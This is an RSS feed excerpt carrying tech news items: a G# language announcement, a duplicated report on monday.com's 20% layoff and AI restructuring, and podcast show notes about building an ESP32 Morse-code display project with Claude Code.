<p class="wp-block-paragraph">With G#, copyrighted in 2026, developers get value-oriented structs, reference-oriented classes, data structs, and data classes. For concurrency, G# uses <code>scope</code> for structured concurrency, <code>async func</code><strong> </strong>and <code>await</code><strong> </strong>for task-based asynchrony, and <code>async sequence[T]</code> for asynchronous streams. G# also makes use of the same <code>Task</code> and <code>Task[T]</code> types familiar from the .NET BCL (Base Class Library).</p>



<p class="wp-block-paragraph">G# documentation is <a href="https://davidobando.github.io/gsharp/" data-type="link" data-id="https://davidobando.github.io/gsharp/">available on the GitHub site</a> of Microsoft software engineer David Obando. “Every .NET type—your packages, third-party NuGet packages, the BCL—is callable from G# with the syntax you already know. CLR generics use G#’s bracket spelling, and method calls, properties, indexers, and <code>for in</code><strong> </strong>over <code>IEnumerable[T]</code> all just work,” according to the website.</p>



<p class="wp-block-paragraph">A Visual Studio Code extension for G3 can be found at <a href="https://marketplace.visualstudio.com/items?itemName=gsharplang.vscode-gsharp">marketplace.visualstudio.com</a>. The extension adds syntax highlighting, language server features, build/run commands, and debugger configuration for <code>.gs</code> and <code>.gsproj</code> files. Developers can install the extension from within VS Code (search for “G#” in the Extensions view) or from the command line.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Monday.com cuts 20% of its workforce to restructure for the AI era]]></title>
<description><![CDATA[Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.



Monday.com co-founder and co-CEO Eran Zinman tod...]]></description>
<link>https://tsecurity.de/de/3687832/it-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687832/it-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</guid>
<pubDate>Thu, 23 Jul 2026 03:02:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.</p>



<p class="wp-block-paragraph">Monday.com co-founder and co-CEO Eran Zinman <a href="https://www.linkedin.com/pulse/building-mondaycom-its-next-chapter-eran-zinman-cxx4e/" target="_blank" rel="noreferrer noopener">today announced</a> the “very difficult decision” to reduce the AI work platform company’s global workforce by about 20%, or 620 people.</p>



<p class="wp-block-paragraph">The move has nothing to do with increasing margins or replacing humans with AI, he insisted in his post on LinkedIn; rather, it’s a calculated decision to trim down and hone the company’s focus as AI becomes integral to day-to-day workflows.</p>



<p class="wp-block-paragraph">“This is not a distress signal; it is a deliberate reset, disclosed with its price attached,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “The industry has quietly swapped the meaning of productivity, and this filing is the clearest exhibit yet.”</p>



<h2 class="wp-block-heading">A ‘significant opportunity’ in technology</h2>



<p class="wp-block-paragraph">In a <a href="https://www.sec.gov/Archives/edgar/data/1845338/000117891326003553/zk2635715.htm" target="_blank" rel="noreferrer noopener">SEC filing</a> this week, monday.com said its restructuring plan reflects the “ongoing transformation of its product, marketing, and go-to-market strategy.” The move is intended to support a “leaner, more focused operating model” as the company continues to invest in its AI-driven strategy.</p>



<p class="wp-block-paragraph">Zinman noted in his post that the company has shifted to “doing the work with AI and not just managing it,” and is focused on building environments where “people and <a href="https://www.cio.com/article/411198/how-to-launch-your-ai-projects-from-pilot-to-production-and-ensure-success.html" target="_blank">AI agents</a> [work] together in one workspace.”</p>



<p class="wp-block-paragraph">In recent months, monday.com has <a href="https://www.computerworld.com/article/3822438/monday-com-aims-to-be-an-ai-first-platform-with-latest-enhancements.html" target="_blank">evolved its products</a>, strategy, and the way it serves its customers, and Zinman contended that “the organization we built for our previous chapter is not the organization that fits the new AI era.” Monday.com needs to “execute more decisively,” take on new challenges, and quickly respond to market changes, he said.</p>



<p class="wp-block-paragraph">“We have never seen such a significant opportunity in software, driven by such exciting technology,” Zinman noted. He emphasized that the reduction is not to replace people with AI, nor to improve margins; the “vast majority” of savings will be reinvested into talent, products, and AI.</p>



<p class="wp-block-paragraph">The restructuring will result in a “flatter organization” with fewer management layers and smaller, more autonomous teams, and monday.com also has a new go-to-market model, Zinman explained. Customers expect “deeper implementation support” as they deploy AI, and the company will work more closely with customers, increase its on-site presence, create new roles, and “adapt many existing ones.” In its SEC filing, the company said it expects to continue hiring in “key strategic areas” throughout 2026.</p>



<p class="wp-block-paragraph">Workers will be expected to work better, “not harder,” Zinman noted. He pointed to several past examples where work could have been done in a few days, but instead took many months with “multiple meetings and endless friction.”</p>



<p class="wp-block-paragraph">“This wasn’t people’s fault and everyone was frustrated by this,” he said. “Our new org changes ownership to allow people to make decisions and move fast.”</p>



<p class="wp-block-paragraph">A spokesperson for monday.com declined to comment further on the staff reductions.</p>



<h2 class="wp-block-heading">Monday.com’s key market advantages</h2>



<p class="wp-block-paragraph">Monday.com certainly isn’t struggling; the company expects 19% to 20% year-over-year growth in 2026.</p>



<p class="wp-block-paragraph">“Companies in that position do not restructure because they must,” Greyhound’s Gogia noted. “They restructure because they have decided to become something else.”</p>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/melody-brue/" target="_blank" rel="noreferrer noopener">Melody Brue</a>, VP and principal analyst at Moor Insights &amp; Strategy, pointed out that organizational redesign is important for real AI transformation, but while it can signal confidence to the market, it can still be “devastating” to humans.</p>



<p class="wp-block-paragraph">While the company looks as though it’s trying to do right, that ultimately remains to be seen, she said. “There are often hidden internal bruises that can surface long after layoffs.”</p>



<p class="wp-block-paragraph">Monday.com’s advantage is in its “structured substrate,” Gogia noted; its boards, permissions and typed workflows give agents something firmer to act on than just documents and chat history. The company highlights its natively built agents that can be configured by any team member, as well as connectors with Claude, Microsoft Copilot, and ChatGPT, and dedicated routes for external agents to authenticate and operate.</p>



<p class="wp-block-paragraph">“For some time, the sharper enterprise question has been shifting from who has an agent to who owns the governed runtime in which an agent can safely act,” he said. “Structured work is a serious claim on that runtime.”</p>



<p class="wp-block-paragraph">But parts of monday.com’s agent estate remain in staged release, and its product is ultimately “mid-transition,” Gogia pointed out; its agent builder carried a beta label as recently as March,. Also, the company’s pricing model changed in May to a hybrid model charging for seats as well as mandatory AI credits. And, while its AI-powered no-code builder monday vibe passed $1 million in annual recurring revenue within two and a half months, monday.com has not released subsequent outcomes, usage volumes, or attach rates.</p>



<p class="wp-block-paragraph">Further, there’s an element of “gravity” with its competitors, he observed. Asana is reorganizing teams around agents, Atlassian is wiring agents into the developer estate, and others are simply bundling them into their offerings: Microsoft is doing so across the productivity stack, and ServiceNow across enterprise operations, each with identity and procurement built in.</p>



<p class="wp-block-paragraph">“Their pull is strongest exactly where monday.com wants to grow, in the largest accounts, where control-plane depth and administrative reach decide the deal,” said Gogia.</p>



<h2 class="wp-block-heading">Actions for the near-term</h2>



<p class="wp-block-paragraph">Going forward, buyers should focus on operating risk, not headline risk, Moor’s Brue noted. In practice, that’s continuity of service, roadmap consistency, and strength of enterprise support. Productivity should be valued as better outcomes per unit of organizational effort, not mere activity.</p>



<p class="wp-block-paragraph">“It should be a measure of how much smoother, faster, and more effective the operating model becomes when AI is built into the work,” said Brue.</p>



<p class="wp-block-paragraph">Gogia noted that strain surfaces first in customer service, and monday.com’s attention is being redistributed. The company’s annual report disclosed that its focus is now concentrated on the largest accounts, with support for medium-sized clients moved to an AI-first and human-supported model.</p>



<p class="wp-block-paragraph">During the first month of the transition, buyers should track named account continuity and escalation times, he advised. By the first quarter, keep an eye on whether credit governance and admin controls mature on schedule, and if the roadmap beyond the AI estate keeps pace. By the half-year mark, determine whether promised implementation depth is producing outcomes or “simply more billable engagement.”</p>



<p class="wp-block-paragraph">Support tiers should be enumerated in writing before renewal, and <a href="https://www.cio.com/article/4192312/4-recs-for-cios-to-optimize-ai-budgets-and-improve-sustainability.html" target="_blank">buyers should contract</a> for “side exits,” Gogia emphasized, with overage pricing fixed in advance, the right to pause consumption, and portability for workflows and agent configuration “if the relationship sours.” Finance should also insist on monthly consumption reporting by capability. Further, integration efforts, partner dependency, and change management should be considered first-class costs of the agent era, “not as afterthoughts to a license.”</p>



<p class="wp-block-paragraph">“A license was a known cost,” said Gogia. “A meter is a behavior, and behavior is harder to forecast than headcount.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4200330/monday-com-cuts-20-of-its-workforce-to-restructure-for-the-ai-era.html" target="_blank">CIO.com</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Monday.com cuts 20% of its workforce to restructure for the AI era]]></title>
<description><![CDATA[Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.



Monday.com co-founder and co-CEO Eran Zinman tod...]]></description>
<link>https://tsecurity.de/de/3687828/it-security-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687828/it-security-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</guid>
<pubDate>Thu, 23 Jul 2026 02:50:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.</p>



<p class="wp-block-paragraph">Monday.com co-founder and co-CEO Eran Zinman <a href="https://www.linkedin.com/pulse/building-mondaycom-its-next-chapter-eran-zinman-cxx4e/" target="_blank" rel="noreferrer noopener">today announced</a> the “very difficult decision” to reduce the AI work platform company’s global workforce by about 20%, or 620 people.</p>



<p class="wp-block-paragraph">The move has nothing to do with increasing margins or replacing humans with AI, he insisted in his post on LinkedIn; rather, it’s a calculated decision to trim down and hone the company’s focus as AI becomes integral to day-to-day workflows.</p>



<p class="wp-block-paragraph">“This is not a distress signal; it is a deliberate reset, disclosed with its price attached,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “The industry has quietly swapped the meaning of productivity, and this filing is the clearest exhibit yet.”</p>



<h2 class="wp-block-heading">A ‘significant opportunity’ in technology</h2>



<p class="wp-block-paragraph">In a <a href="https://www.sec.gov/Archives/edgar/data/1845338/000117891326003553/zk2635715.htm" target="_blank" rel="noreferrer noopener">SEC filing</a> this week, monday.com said its restructuring plan reflects the “ongoing transformation of its product, marketing, and go-to-market strategy.” The move is intended to support a “leaner, more focused operating model” as the company continues to invest in its AI-driven strategy.</p>



<p class="wp-block-paragraph">Zinman noted in his post that the company has shifted to “doing the work with AI and not just managing it,” and is focused on building environments where “people and <a href="https://www.cio.com/article/411198/how-to-launch-your-ai-projects-from-pilot-to-production-and-ensure-success.html" target="_blank">AI agents</a> [work] together in one workspace.”</p>



<p class="wp-block-paragraph">In recent months, monday.com has <a href="https://www.computerworld.com/article/3822438/monday-com-aims-to-be-an-ai-first-platform-with-latest-enhancements.html" target="_blank">evolved its products</a>, strategy, and the way it serves its customers, and Zinman contended that “the organization we built for our previous chapter is not the organization that fits the new AI era.” Monday.com needs to “execute more decisively,” take on new challenges, and quickly respond to market changes, he said.</p>



<p class="wp-block-paragraph">“We have never seen such a significant opportunity in software, driven by such exciting technology,” Zinman noted. He emphasized that the reduction is not to replace people with AI, nor to improve margins; the “vast majority” of savings will be reinvested into talent, products, and AI.</p>



<p class="wp-block-paragraph">The restructuring will result in a “flatter organization” with fewer management layers and smaller, more autonomous teams, and monday.com also has a new go-to-market model, Zinman explained. Customers expect “deeper implementation support” as they deploy AI, and the company will work more closely with customers, increase its on-site presence, create new roles, and “adapt many existing ones.” In its SEC filing, the company said it expects to continue hiring in “key strategic areas” throughout 2026.</p>



<p class="wp-block-paragraph">Workers will be expected to work better, “not harder,” Zinman noted. He pointed to several past examples where work could have been done in a few days, but instead took many months with “multiple meetings and endless friction.”</p>



<p class="wp-block-paragraph">“This wasn’t people’s fault and everyone was frustrated by this,” he said. “Our new org changes ownership to allow people to make decisions and move fast.”</p>



<p class="wp-block-paragraph">A spokesperson for monday.com declined to comment further on the staff reductions.</p>



<h2 class="wp-block-heading">Monday’s key market advantages</h2>



<p class="wp-block-paragraph">Monday.com certainly isn’t struggling; the company expects 19% to 20% year-over-year growth in 2026.</p>



<p class="wp-block-paragraph">“Companies in that position do not restructure because they must,” Greyhound’s Gogia noted. “They restructure because they have decided to become something else.”</p>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/melody-brue/" target="_blank" rel="noreferrer noopener">Melody Brue</a>, VP and principal analyst at Moor Insights &amp; Strategy, pointed out that organizational redesign is important for real AI transformation, but while it can signal confidence to the market, it can still be “devastating” to humans.</p>



<p class="wp-block-paragraph">While the company looks as though it’s trying to do right, that ultimately remains to be seen, she said. “There are often hidden internal bruises that can surface long after layoffs.”</p>



<p class="wp-block-paragraph">Monday.com’s advantage is in its “structured substrate,” Gogia noted; its boards, permissions and typed workflows give agents something firmer to act on than just documents and chat history. The company highlights its natively built agents that can be configured by any team member, as well as connectors with Claude, Microsoft Copilot, and ChatGPT, and dedicated routes for external agents to authenticate and operate.</p>



<p class="wp-block-paragraph">“For some time, the sharper enterprise question has been shifting from who has an agent to who owns the governed runtime in which an agent can safely act,” he said. “Structured work is a serious claim on that runtime.”</p>



<p class="wp-block-paragraph">But parts of monday.com’s agent estate remain in staged release, and its product is ultimately “mid-transition,” Gogia pointed out; its agent builder carried a beta label as recently as March,. Also, the company’s pricing model changed in May to a hybrid model charging for seats as well as mandatory AI credits. And, while its AI-powered no-code builder monday vibe passed $1 million in annual recurring revenue within two and a half months, monday.com has not released subsequent outcomes, usage volumes, or attach rates.</p>



<p class="wp-block-paragraph">Further, there’s an element of “gravity” with its competitors, he observed. Asana is reorganizing teams around agents, Atlassian is wiring agents into the developer estate, and others are simply bundling them into their offerings: Microsoft is doing so across the productivity stack, and ServiceNow across enterprise operations, each with identity and procurement built in.</p>



<p class="wp-block-paragraph">“Their pull is strongest exactly where monday.com wants to grow, in the largest accounts, where control-plane depth and administrative reach decide the deal,” said Gogia.</p>



<h2 class="wp-block-heading">Actions for the near-term</h2>



<p class="wp-block-paragraph">Going forward, buyers should focus on operating risk, not headline risk, Moor’s Brue noted. In practice, that’s continuity of service, roadmap consistency, and strength of enterprise support. Productivity should be valued as better outcomes per unit of organizational effort, not mere activity.</p>



<p class="wp-block-paragraph">“It should be a measure of how much smoother, faster, and more effective the operating model becomes when AI is built into the work,” said Brue.</p>



<p class="wp-block-paragraph">Gogia noted that strain surfaces first in customer service, and monday.com’s attention is being redistributed. The company’s annual report disclosed that its focus is now concentrated on the largest accounts, with support for medium-sized clients moved to an AI-first and human-supported model.</p>



<p class="wp-block-paragraph">During the first month of the transition, buyers should track named account continuity and escalation times, he advised. By the first quarter, keep an eye on whether credit governance and admin controls mature on schedule, and if the roadmap beyond the AI estate keeps pace. By the half-year mark, determine whether promised implementation depth is producing outcomes or “simply more billable engagement.”</p>



<p class="wp-block-paragraph">Support tiers should be enumerated in writing before renewal, and <a href="https://www.cio.com/article/4192312/4-recs-for-cios-to-optimize-ai-budgets-and-improve-sustainability.html" target="_blank">buyers should contract</a> for “side exits,” Gogia emphasized, with overage pricing fixed in advance, the right to pause consumption, and portability for workflows and agent configuration “if the relationship sours.” Finance should also insist on monthly consumption reporting by capability. Further, integration efforts, partner dependency, and change management should be considered first-class costs of the agent era, “not as afterthoughts to a license.”</p>



<p class="wp-block-paragraph">“A license was a known cost,” said Gogia. “A meter is a behavior, and behavior is harder to forecast than headcount.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4689: Cheap Yellow Display Project Part 8: Writing the code]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.



Hello, again. This is Trey.










Welcome to part 8 in my Cheap Yellow Display (CYD) Project series.  










If you wish to catch up on earlier episodes, you can find them on my 

HPR profile page



https://www.hackerp...]]></description>
<link>https://tsecurity.de/de/3687798/podcasts/hpr4689-cheap-yellow-display-project-part-8-writing-the-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687798/podcasts/hpr4689-cheap-yellow-display-project-part-8-writing-the-code/</guid>
<pubDate>Thu, 23 Jul 2026 02:06:01 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>

Hello, again. This is Trey.

</p>

<p>


</p>

<p>

Welcome to part 8 in my Cheap Yellow Display (CYD) Project series.  

</p>

<p>


</p>

<p>

If you wish to catch up on earlier episodes, you can find them on my 
<a href="https://www.hackerpublicradio.org/correspondents/0394.html" rel="noopener noreferrer" target="_blank">
HPR profile page</a>


<a href="https://www.hackerpublicradio.org/correspondents/0394.html" rel="noopener noreferrer" target="_blank">
https://www.hackerpublicradio.org/correspondents/0394.html</a>



</p>

<p>


</p>

<p>

It is hard to believe that I started this project and the HPR series to document it more than a year ago.  Time flies.  Life happens. I spent the last 8 months so focused on work related activities that I had to set the project aside.  And once I set it aside, it was difficult to get back to again.  The one time I tried, I found that my son's old Windows laptop, which I had commandeered to use for the project, was once and truly dead.  

</p>

<p>


</p>

<p>

We live in a different world now than we did when I began this project.  Today, everything is about AI – how it is changing our world, increasing efficiencies, and even displacing certain types of jobs.  "Vibe coding" is transforming the way we make software, and now everyone is a developer.

</p>

<p>


</p>

<p>

Within my organization, we are all being strongly encouraged to learn more about AI and apply it in our daily work.  We are blessed to have access to a wide range of training and to powerful tools which support the process.  Several colleagues within my organization and outside my organization have recommended Claude Code -- for development, for organization, for brainstorming, and for much more.  My role is not that of a developer, and I have had no need for Claude Code at work.  There are plenty of other tools for me to use.

</p>

<p>


</p>

<p>

But at home, I thought... I could install Claude Code at home to experiment with and to learn.  And then it hit me.  I wonder if I could use Claude Code to help me with my stalled CYD project.  

</p>

<p>


</p>

<p>

"Hello, my name is Trey, and I am a fraud."

</p>

<p>


</p>

<p>

OK.  I don't think I am a fraud, but having never used such a powerful tool to help me code, I feel a little bit like a fraud, with Claude doing the work for me. Let's talk through what we did.

</p>

<p>


</p>

<p>

As I mentioned, I was unable to use the laptop on which I created the original GUI code.  But no worries, because It was all on GitHub, right?

</p>

<p>


</p>

<p>

So, I began by trying to install Claude Code on one of my Ubuntu machines.  That failed miserably, and all the instructions I found online recommended running it on Windows.  So I transitioned to installing Claude Code on a freshly built Windows 10 system using some old hardware which will not support Windows 11.  Surprisingly, It seems that Claude wants to run within Ubuntu on Windows Subsystem for Linux (WSL).

</p>

<p>


</p>

<p>

Once I went through all the hoops for installing and setting up my basic subscription, I got to work.  I created a new directory to use for all my project files, and another one for Claude to write all its output files to.

</p>

<p>


</p>

<p>

Everything I have read and heard about using Claude Code for a project like this recommended beginning by using Claude to create the project plan.  So my first prompt was as follows:

</p>

<p>


</p>

<p>

"I am building a project using an ESP32 cheap yellow display. The final goal is to have a device with a graphical user interface which will allow me store several text messages, each assigned to their own specific button. Then, when one of the buttons is pressed, the message will be converted into morse code, and the message will be sent by blinking an onboard LED. I already have the initial design for the GUI coded in my github repository. Please construct a detailed step by step plan for building this application"

</p>

<p>


</p>

<p>

I wanted to keep it simple at the beginning, so even though I plan to use an opto-isolated relay for the output, I am starting out using the built in LED.

</p>

<p>


</p>

<p>

Claude asked me for the URL for my Github repository, and I provided it.  After thinking for a bit, it produced a project plan.

</p>

<p>


</p>

<p>

CYD Morse Sender — Step-by-Step Build Plan

</p>

<p>


</p>

<p>

What You Already Have

</p>

<p>

- 3 fully designed LVGL screens (Send, Config, Keyboard)

</p>

<p>

- 7 send buttons with green styling on the Send Screen

</p>

<p>

- Speed slider (5–30 WPM) and program slot dropdown on Config Screen

</p>

<p>

- Text area + LVGL keyboard widget on Keyboard Screen

</p>

<p>

- Display driver and touchscreen hardware initialized (but touch read was stubbed out)

</p>

<p>

---

</p>

<p>

Phase 1: Fix Touchscreen Input

</p>

<p>

Initialize the XPT2046 on VSPI, replace the hardcoded touched = false with real touch data, calibrate raw ADC coordinates to screen pixels, and verify all three nav buttons transition screens correctly.                         

</p>

<p>


</p>

<p>

Phase 2: Persistent Message Storage

</p>

<p>

Use Preferences.h / NVS to store 7 messages ("msg0" – "msg6") that survive power cycles. Load on boot and populate send button labels.

</p>

<p>


</p>

<p>

Phase 3: Config Screen — Slot Selection &amp; Speed

</p>

<p>

Wire the Program dropdown to g_selectedSlot, wire the Speed slider to g_wpm with a live WPM label, and wire the Set button to clear the text area and navigate to the Keyboard Screen.

</p>

<p>


</p>

<p>

Phase 4: Keyboard Screen — Capture and Save Text

</p>

<p>

On keyboard OK (LV_EVENT_READY): read the text area, save to NVS, update the send button label, navigate back. On Cancel: navigate back without saving.

</p>

<p>


</p>

<p>

Phase 5: Morse Code Engine

</p>

<p>

Build morse.h with the full A–Z / 0–9 lookup table, a textToMorse() converter, and Paris-standard timing (unit_ms = 1200 / wpm).

</p>

<p>


</p>

<p>

Phase 6: Non-Blocking LED Transmission

</p>

<p>

State machine (IDLE / LED_ON / LED_OFF) driven by millis() in a morseUpdate() function called every loop — no delay().   LED on GPIO 17 (blue).

</p>

<p>


</p>

<p>

Phase 7: Wire the Send Buttons

</p>

<p>

Each button calls startMorse(getMessage(slot)) if not already transmitting. Disable all send buttons during TX; re-enable when the state machine reaches the end.

</p>

<p>


</p>

<p>

Phase 8: Integration &amp; Polish

</p>

<p>

Stop button, WPM persistence, empty-slot guard, serial debug output, final touch calibration, end-to-end test checklist.

</p>

<p>

---

</p>

<p>

Recommended order: Phase 1 → 2 → 7 (partial) → 5 → 6 → 7 (full) → 3 → 4 → 8

</p>

<p>


</p>

<p>


</p>

<p>

This was wild!  Claude determined exactly how far along I was in the project, and also alerted me to the fact that the "touch read was stubbed out".  Ugh.  This means that the files I had uploaded to GitHub were my original GUI files (Episode 05 – HPR4532 - 
<a href="https://hackerpublicradio.org/eps/hpr4532/index.html" rel="noopener noreferrer" target="_blank">
https://hackerpublicradio.org/eps/hpr4532/index.html</a>

) and not the ones that I finally got working properly (Episode 07 – HPR4624 - 
<a href="https://hackerpublicradio.org/eps/hpr4624/index.html" rel="noopener noreferrer" target="_blank">
https://hackerpublicradio.org/eps/hpr4624/index.html</a>

).  That was my own fault.  Did I mention that I don't get Git?  I REALLY need to learn to properly use Git!

</p>

<p>


</p>

<p>

But, we have a plan, broken down by eight numbered phases.  And they seem to address all the functionality I wanted with a few additional things I had not thought about.  Interestingly, even though these phases are sequentially numbered, Claud recommended that we approach them in a bizarre order: Phase 1 → 2 → 7 (partial) → 5 → 6 → 7 (full) → 3 → 4 → 8 .

</p>

<p>


</p>

<p>

Alright.  Let's see what we can do.  The first phase is to fix the touchscreen input.  

</p>

<p>


</p>

<p>

Claude took me through it step-by-step, asking as it needed to read specific project files.

</p>

<p>


</p>

<p>

Finally, it wrote a new ui.ino code file to my speficied output directory for me to test.  I copied it into the correct file location, said a quick prayer, compiled in Arduino IDE, and downloaded to the CYD.

</p>

<p>


</p>

<p>

Well, that is... interesting.  The display looked nothing like it was supposed to.  There were vertical green bars with smaller dashed green vertical stripes in them. I will include a picture in the show notes so that you can see what it looked like and why it was so difficult to describe.  

</p>

<p>


</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_1.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_1_tn.jpeg">
</a>

</p>

<p>


</p>

<p>

I spent the next hour or so trying to explain what I was seeing to a chat bot.  Claude recommended potential fixes which either did nothing or made the situation worse.  I began questioning whether this was a good idea, how people actually gained efficiencies talking to a bot, and even several life choices.  

</p>

<p>


</p>

<p>

Then I had a thought.  I prompted Claude:

</p>

<p>


</p>

<p>

If I were to take a picture of the screen on the cheap yellow display and copy it into the output folder, would you be able to analyze it to better determine what is wrong and how to fix it?

</p>

<p>


</p>

<p>

Shockingly, Claude answered in the affirmative, and told me to copy the picture to the output folder and let it know when to proceed.  It analyzed the picture and more of the supporting files it had copied from my GitHub, asking each time if it could access that file.  It determined that my original code was written for a flavor of LVGL version 8 and I was now using LVGL 9.5.  

</p>

<p>


</p>

<p>

It recommended changes, and then asked permission to make those changes, file by file.  .h files &amp; .c files,  Finally, I just gave it permission to edit the files in the project folder without asking for permission for each file each time.  Claude was still explaining each change, showing me exactly what would be changed, and asking for permission, so that I could review all of the changes.  But now it was not asking additional permission to write to each of the impacted files.

</p>

<p>


</p>

<p>

Next, Code compiled and downloaded.  Different screen, but not right. Again, I took a picture and gave it to Claude to analyze.  So, Claude paused and altered the code to generate a specific test pattern overtop of the GUI.

</p>

<p>


</p>

<p>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_2.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_2_tn.jpeg">
</a>

</p>

<p>


</p>

<p>

The test pattern was supposed to cover the entire rectangular screen.  But parts of the pattern were in a square on the screen and parts were not.  Another photograph and analysis, told Claude that there were some rotation/screensize issues.

</p>

<p>


</p>

<p>

We repeated this several times.  Some resulted in improvement, and others did not.

</p>

<p>


</p>

<p>

This is the point where I noticed something interesting. Not about Claude, specifically, or about the app.  But I noticed something interesting about myself and about the process.

</p>

<p>


</p>

<p>

Previously, when I was working through some of these challenges without Claud, I found myself becoming more and more stressed, frustrated, and angry, until I found a solution.  Then another problem would repeat the cycle.  Success in the end was great, but the emotional extremes during the process were not always pleasant.  

</p>

<p>


</p>

<p>

Now, I was effectively managing the project, and relaying information to the resource responsible for fixing the problems -- a very different experience.

</p>

<p>


</p>

<p>

But I also ran into another issue.  Claude became absolutely certain that the problem revolved around the device not accurately knowing where the 4 corners of the screen were.  But in reality, the output of the test pattern was rotated 90 degrees from the actual screen.  It took several iterations of me insisting that the problem had to do with screen orientation and not corner coordinates.  It was interesting to experience the tool doubling down on an obvious mistake, but we finally resolved that.

</p>

<p>


</p>

<p>

Again, while it was frustrating, it was much less stressful.

</p>

<p>


</p>

<p>


</p>

<p>

We proceeded to 
<strong>

<em>
Phase 2: Persistent Message Storage</em>

</strong>

where we ensured that the button labels on the send screen were stored in the devices persistent storage, so that, when they are edited to contain the message they should send, that information would survive a reboot.

</p>

<p>


</p>

<p>

Next, we combined elements of 
<strong>

<em>
Phase 5: Morse Code Engine</em>

</strong>

, 
<strong>

<em>
Phase 6: Non-Blocking LED Transmission</em>

</strong>

, and 
<strong>

<em>
Phase 7: Wire the Send Buttons</em>

</strong>

together. Building the morse code engine was an area I had been thinking about for a while.  I already had working parts of something similar in the Arduino practice oscillator I have referenced a few times in this series.  The code for the practice oscillator may be found on my GitHub, but it was all based on original code from jmharvey1, with my only contribution being making pin assignments variables so that the code could easily be ported to different devices.  

</p>

<p>


</p>

<p>

So, I was happy that we were building the morse code engine directly.  The code for it may be found in morse.h, which uses a constant character lookup table to define each character.  Without any specific direction from me, Claude used the PARIS timing methods I have already described within Episode 6 of this series.  It defines timing for DOT, DASH, LETTER_GAP, and WORD_GAP, and all are based on a simple calculation of 1200 ms / the number of words per minute (WPM) we wish to transmit.

</p>

<p>


</p>

<p>

Along the way, we discovered that, if we tried to use the delay() function, it would crash the program due to a conflict with the LVGL timer used for touchscreen inputs. Claude altered all the delays accordingly.

</p>

<p>


</p>

<p>

Then, 
<strong>

<em>
Phase 3: Config Screen — Slot Selection &amp; Speed</em>

</strong>

allowed us to configure the WPM we wished to use in addition to selecting a specific Send button to reconfigure.  This forced us to work on 
<strong>

<em>
Phase 4: Keyboard Screen — Capture and Save Text</em>

</strong>

which is used to type the entries for each Send button.  At this point, I also decided that we would want to also use the Keyboard Screen to send ad hoc morse as we typed it.

</p>

<p>


</p>

<p>

During this phase we discovered several bugs which seemed to cause random freezes.  Careful troubleshooting with messages output to the Arduino IDE's serial console helped us narrow down the causes and remedy them.

</p>

<p>


</p>

<p>

Finally all the tests worked and I am able to merrily pre-configure macro buttons with custom messages and use the CYD to send the morse code for those messages to the on-board LED at whichever rate I specify.

</p>

<p>


</p>

<p>

I have noticed in my presentation of this narrative that I repeatedly slip into the first person plural terms "we" and "us" instead of the first person singular terms "I" and "me".  I have unconsciously personified Claud and recognized it as an integral part of my (formerly one person) development team.

</p>

<p>


</p>

<p>

I finally configured Claude to connect to my GitHub repo and upload all the files and documentation. We additionally created a CYD-Narrative.md file which describes in more detail all the work which was done on the project.  I still do not 100% get git, but we are successfully using it.

</p>

<p>


</p>

<p>

You can find all these files in my GitHub repo (
<a href="https://github.com/jttrey3/CYD_MorseSender" rel="noopener noreferrer" target="_blank">
https://github.com/jttrey3/CYD_MorseSender</a>

) where they are shared under a GPL 3.0 license.

</p>

<p>


</p>

<p>

There are still several additional steps I plan to complete in the next few months.  

</p>

<p>


</p>

<p>

1. I will be integrating an opto-isolated relay which will allow me to plug the device into the straight key input on any amateur radio.  This will require a battery power source, charge controller, and more hardware.

</p>

<ol>

<li>

